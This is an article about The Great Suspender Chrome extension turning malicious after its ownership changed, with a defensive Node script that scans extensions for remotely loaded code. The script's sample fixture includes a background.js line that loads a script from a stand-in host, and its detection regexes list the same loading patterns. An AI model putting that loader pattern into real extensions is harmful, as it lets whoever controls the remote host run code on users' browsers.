On February 4, millions of browser tabs suddenly vanished. The Great Suspender, an open source Chrome extension, had shipped a malicious update in October of last year after changing maintainers; four months later, Google forcibly removed the extension from the Chrome Web Store. The incident highlights the question of control in open source projects. Who owns the code of an open source project? The original author? The current maintainer? Or the community as a whole?
Most open source projects have no foundation or formal governance structure behind them. Hosting platforms such as GitHub let several individuals or a core team share control of a project, but distribution channels such as the Chrome Web Store or the Apple App Store tie a listing to a single developer account, and whoever holds that account is the one responsible for publishing each release.
The Great Suspender suspends inactive tabs to free memory. Its maintainer, Dean Oemcke, decided to move on to other projects in June 2020 and transferred ownership of both the GitHub repository and the Web Store listing to an undisclosed party. The extension's users had no reason to care about the change of ownership, but they were about to feel its effects: last October, the new maintainer released an update that downloaded and executed JavaScript files from a third-party domain.
The update also disabled automatic updates, so even once the malicious code was removed, existing users would keep running the malicious version. This is not the first time an open source project has turned malicious after changing hands. Raymond Hill handed ownership of uBlock to a new maintainer, Chris Aljoudi, who went on to use the project for profit and eventually let advertisers pay to avoid being blocked. That led Raymond Hill to create the fork uBlock Origin.
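A practitioner who inherits or audits an extension will want to check for exactly the pattern described above: code that is fetched from a remote origin at runtime rather than shipped in the package. The following Node script is an added example written for this article, not code from The Great Suspender or any project named here. It scans a manifest and a set of source files for remote-code-loading indicators (script elements pointed at a remote URL, eval and the Function constructor, executeScript with a code string, dynamic import() from a URL) and checks the manifest's content security policy for remote script hosts and 'unsafe-eval'. The manifest, file names and domains in the sample input are constructed for the demonstration; cdn.example.invalid is a reserved, non-resolving name.

```javascript
'use strict';
// Added example: static triage of an unpacked Chrome extension for remotely loaded code.
// Not part of The Great Suspender or any other project discussed in the article.

// Each indicator is a regex plus a short explanation that goes into the report.
const CODE_INDICATORS = [
  { id: 'remote-script-tag', re: /\.src\s*=\s*['"`]https?:\/\/[^'"`]+['"`]/g,
    why: 'script element src set to a remote URL' },
  { id: 'eval', re: /\beval\s*\(/g, why: 'eval() executes strings as code' },
  { id: 'new-function', re: /\bnew\s+Function\s*\(/g, why: 'Function constructor builds code from strings' },
  { id: 'executeScript-code', re: /executeScript\s*\(\s*\{[^}]*\bcode\s*:/g,
    why: 'tabs.executeScript with a code string instead of a bundled file' },
  { id: 'import-remote', re: /\bimport\s*\(\s*['"`]https?:\/\//g, why: 'dynamic import() from a remote URL' },
];

// Any http(s) URL literal; the report lists them so the auditor can see which hosts the code talks to.
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?::\d+)?(?:\/[^\s'"`<>)]*)?/g;

function lineOf(source, index) {
  return source.slice(0, index).split('\n').length;
}

function extractUrls(source) {
  return Array.from(new Set(source.match(URL_RE) || []));
}

// Run every indicator over one source file and return findings with 1-based line numbers.
function scanSource(name, source) {
  const findings = [];
  for (const ind of CODE_INDICATORS) {
    ind.re.lastIndex = 0; // shared global regex: reset before reuse
    let m;
    while ((m = ind.re.exec(source)) !== null) {
      findings.push({ file: name, id: ind.id, line: lineOf(source, m.index), why: ind.why });
    }
  }
  return findings;
}

// Manifest checks: MV2 (remote code permitted), remote hosts in script-src, 'unsafe-eval'.
function scanManifest(manifestJson) {
  const manifest = JSON.parse(manifestJson);
  const findings = [];
  if (manifest.manifest_version === 2) {
    findings.push({ file: 'manifest.json', id: 'manifest-v2', line: 0,
      why: 'Manifest V2 permits remotely hosted code; V3 forbids it' });
  }
  // MV2 stores the CSP as a string; MV3 stores an object keyed by context (extension_pages, sandbox).
  const cspField = manifest.content_security_policy;
  const csp = typeof cspField === 'string' ? cspField : (cspField && cspField.extension_pages) || '';
  const scriptSrc = csp.split(';').map(s => s.trim()).find(s => s.startsWith('script-src')) || '';
  if (/'unsafe-eval'/.test(scriptSrc)) {
    findings.push({ file: 'manifest.json', id: 'csp-unsafe-eval', line: 0, why: "script-src allows 'unsafe-eval'" });
  }
  const remoteHosts = scriptSrc.split(/\s+/).slice(1).filter(t => /^https?:/.test(t));
  if (remoteHosts.length > 0) {
    findings.push({ file: 'manifest.json', id: 'csp-remote-script-src', line: 0,
      why: 'script-src allows remote hosts: ' + remoteHosts.join(', ') });
  }
  return findings;
}

// files: object mapping file name -> source text. Returns all findings plus every URL seen.
function auditExtension(manifestJson, files) {
  const findings = scanManifest(manifestJson);
  const urls = new Set();
  for (const [name, source] of Object.entries(files)) {
    findings.push(...scanSource(name, source));
    extractUrls(source).forEach(u => urls.add(u));
  }
  return { findings, urls: Array.from(urls) };
}

// Constructed sample input (not the real extension's files): an MV2 manifest whose CSP admits a
// remote script host, a background page that loads a script from it, and one benign file.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: 'tab-suspender-sample',
  version: '0.0.1',
  content_security_policy: "script-src 'self' https://cdn.example.invalid; object-src 'self'",
});
const SAMPLE_FILES = {
  'background.js': [
    "const s = document.createElement('script');",
    "s.src = 'https://cdn.example.invalid/loader.js';",
    'document.head.appendChild(s);',
  ].join('\n'),
  'suspend.js': 'chrome.tabs.onActivated.addListener(info => chrome.tabs.discard(info.tabId));',
};

// Usage: `node audit.js` runs the sample; `node audit.js /path/to/unpacked-extension` audits a real tree.
if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('fs');
  const path = require('path');
  let manifestJson = SAMPLE_MANIFEST;
  let files = SAMPLE_FILES;
  if (process.argv[2]) {
    const root = process.argv[2];
    manifestJson = fs.readFileSync(path.join(root, 'manifest.json'), 'utf8');
    files = {};
    const walk = dir => fs.readdirSync(dir, { withFileTypes: true }).forEach(ent => {
      const p = path.join(dir, ent.name);
      if (ent.isDirectory()) walk(p);
      else if (p.endsWith('.js')) files[path.relative(root, p)] = fs.readFileSync(p, 'utf8');
    });
    walk(root);
  }
  const report = auditExtension(manifestJson, files);
  for (const f of report.findings) console.log(`${f.file}:${f.line} ${f.id}: ${f.why}`);
  console.log('URLs referenced:', report.urls.join(', ') || '(none)');
}
```

The indicators are deliberately coarse: a hit is a place to read, not proof of malice, and an obfuscated loader can evade every regex here. The manifest checks are the more durable signal, since a Manifest V3 extension cannot load remote scripts at all, and a script-src that names an external host is a standing invitation for whoever controls that host.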
Hugo Xu's extensions Nano Adblocker and Nano Defender, both based on uBlock Origin, likewise turned malicious after ownership of the project was transferred to a group of Turkish developers.